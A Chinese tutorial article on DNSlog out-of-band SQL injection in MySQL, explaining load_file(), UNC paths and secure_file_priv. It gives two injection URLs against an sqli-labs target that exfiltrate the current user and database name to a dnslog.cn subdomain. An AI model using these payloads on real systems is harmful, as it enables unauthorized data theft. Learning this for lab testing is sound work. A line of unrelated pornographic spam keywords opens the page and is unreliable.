欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

DNS log注入原理解析

 更新時(shí)間:2023年05月23日 10:27:17   作者:XD前端  
這篇文章主要介紹了DNS log注入原理解析,本文給大家介紹的非常詳細(xì),對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下

核心:

將盲注轉(zhuǎn)換為顯錯注入

原理:

通常我們面對SQL注入過程中沒有回顯的情況下,只能通過盲注的方式來判斷是否存在SQL注入,但是,使用盲注,手工測試是需要花費(fèi)大量的時(shí)間的,可能會想到使用sqlmap直接去跑出數(shù)據(jù),但在實(shí)際測試中,使用sqlmap跑盲注,有很大的幾率,網(wǎng)站把ip給封掉,這就影響了我們的測試進(jìn)度,也許你也可以使用代理池

我們輸入域名之后 我們的本地域名服務(wù)器會把在自身服務(wù)器里面查詢是否存在ip地址 如果沒有則發(fā)送到根域名服務(wù)器 如果根域名服務(wù)器里面有對應(yīng)的記錄則返回 如果沒有則告訴本地域名服務(wù)器去向頂級域名服務(wù)器查找。

dns在解析的時(shí)候會留下記錄。

當(dāng)dns服務(wù)器是我們自己的時(shí),我們就可以通過查看日志來查詢一些信息

什么是UNC?

UNC路徑就是類似\softer這樣的形式的網(wǎng)絡(luò)路徑。它符合 \servername\sharename 格式,其中 servername 是服務(wù)器名,sharename 是共享資源的名稱。

注入所需條件?

首先說明,dns帶外查詢屬于MySQL注入,在MySQL中有個(gè)系統(tǒng)屬性

secure_file_priv特性,有三種狀態(tài):

secure_file_priv為null    表示不允許導(dǎo)入導(dǎo)出
secure_file_priv指定文件夾時(shí),表示mysql的導(dǎo)入導(dǎo)出只能發(fā)生在指定的文件夾
secure_file_priv沒有設(shè)置時(shí),則表示沒有任何限制
可了解一下load_file和outfile

LOAD_FILE()函數(shù):LOAD_FILE()函數(shù)讀取一個(gè)文件并將其內(nèi)容作為字符串返回 

語法為:load_file(file_name),其中file_name是文件的完整路徑

不管是布爾類型盲注還是時(shí)間盲注,都需要發(fā)送大量的數(shù)據(jù)包去判斷數(shù)據(jù),而這很可能會觸發(fā)WAF的防護(hù),因此導(dǎo)致被封IP。所以,如果條件允許,我們可以結(jié)合DNSlog來快速的回顯數(shù)據(jù)。MySQL數(shù)據(jù)庫,通過DNSlog盲注需要用到 load_file() 函數(shù),該函數(shù)不僅能加載本地文件,同時(shí)也能對URL發(fā)起請求。因?yàn)樾枰褂?load_file() 函數(shù),所以需要root權(quán)限,并且 secure_file_priv 需要為空。并且服務(wù)器要為Windows操作系統(tǒng)。

注入語句:

# 查詢當(dāng)前用戶名
http://192.168.157.129/sql-labs/Less-1/?id=1' and (select load_file(concat('\\\\',(select hex(user())),'.682y4b.dnslog.cn/abc'))) --+
# 查看當(dāng)前數(shù)據(jù)庫名
http://192.168.157.129/sql-labs/Less-1/?id=1' and (select load_file(concat('\\\\',(select database()),'.682y4b.dnslog.cn/abc'))) --+

到此這篇關(guān)于DNS log注入原理的文章就介紹到這了,更多相關(guān)DNS log注入原理內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Windows Server 2019 DNS服務(wù)器的配置與管理之DNS轉(zhuǎn)發(fā)器

    Windows Server 2019 DNS服務(wù)器的配置與管理之DNS轉(zhuǎn)發(fā)器

    這篇文章主要介紹了Windows Server 2019 DNS服務(wù)器的配置與管理之DNS轉(zhuǎn)發(fā)器,需要的朋友可以參考下
    2023-05-05
  • DNS服務(wù)器可能不可用的解決方法

    DNS服務(wù)器可能不可用的解決方法

    這篇文章主要介紹了DNS服務(wù)器可能不可用的解決方法,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2006-11-11
  • 域名DNS解析的故障解決方法

    域名DNS解析的故障解決方法

    在實(shí)際應(yīng)用過程中可能會遇到DNS解析錯誤的問題,就是說當(dāng)我們訪問一個(gè)域名時(shí)無法完成將其解析到IP地址的工作,而直接輸入網(wǎng)站IP卻可以正常訪問,這就是因?yàn)镈NS解析出現(xiàn)故障造成的。
    2009-06-06
  • win2003 DNS服務(wù)器配置方法[圖文詳解]

    win2003 DNS服務(wù)器配置方法[圖文詳解]

    目前很多企業(yè)事業(yè)單位都建立了單位內(nèi)部的局域網(wǎng),網(wǎng)絡(luò)內(nèi)部都配備相關(guān)的服務(wù)器(如web、ftp等服務(wù)器)。內(nèi)部網(wǎng)絡(luò)的用戶都希望所有的服務(wù)器都用域名來訪問,網(wǎng)絡(luò)管理員可以采用在內(nèi)部搭建DNS服務(wù)器的方式來實(shí)現(xiàn)
    2012-10-10
  • DNS_PROBE_FINISHED_NXDOMAIN錯誤如何修復(fù)

    DNS_PROBE_FINISHED_NXDOMAIN錯誤如何修復(fù)

    DNS_PROBE_FINISHED_NXDOMAIN是您嘗試訪問網(wǎng)站時(shí)隨時(shí)可能在瀏覽器上顯示的錯誤,本文主要介紹了3種解決方法,具有一定的參考價(jià)值,感興趣的可以了解一下
    2023-05-05
  • DNS log注入原理解析

    DNS log注入原理解析

    這篇文章主要介紹了DNS log注入原理解析,本文給大家介紹的非常詳細(xì),對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2023-05-05
  • 使用Unbound配置DNS緩存服務(wù)器的實(shí)現(xiàn)步驟

    使用Unbound配置DNS緩存服務(wù)器的實(shí)現(xiàn)步驟

    本文主要介紹了使用Unbound配置DNS緩存服務(wù)器的實(shí)現(xiàn)步驟,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-08-08
  • DNS服務(wù)器未響應(yīng)的原因及解決方法

    DNS服務(wù)器未響應(yīng)的原因及解決方法

    DNS是進(jìn)行域名和與之相對應(yīng)的IP地址轉(zhuǎn)換的服務(wù)器,本文主要介紹了DNS服務(wù)器未響應(yīng)的原因及解決方法,具有一定的參考價(jià)值,感興趣的可以了解一下
    2023-10-10
  • DNSLog使用方法及場景分析

    DNSLog使用方法及場景分析

    這篇文章主要介紹了DNSLog使用方法,本文給大家介紹的非常詳細(xì),對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2023-05-05
  • DNS服務(wù)器管理與配置技巧淺談

    DNS服務(wù)器管理與配置技巧淺談

    DNS服務(wù)器用于TCP/IP網(wǎng)絡(luò)中,它用來通過用戶友好的名稱代替難記的IP地址以定位計(jì)算機(jī)和服務(wù)。
    2010-12-12

最新評論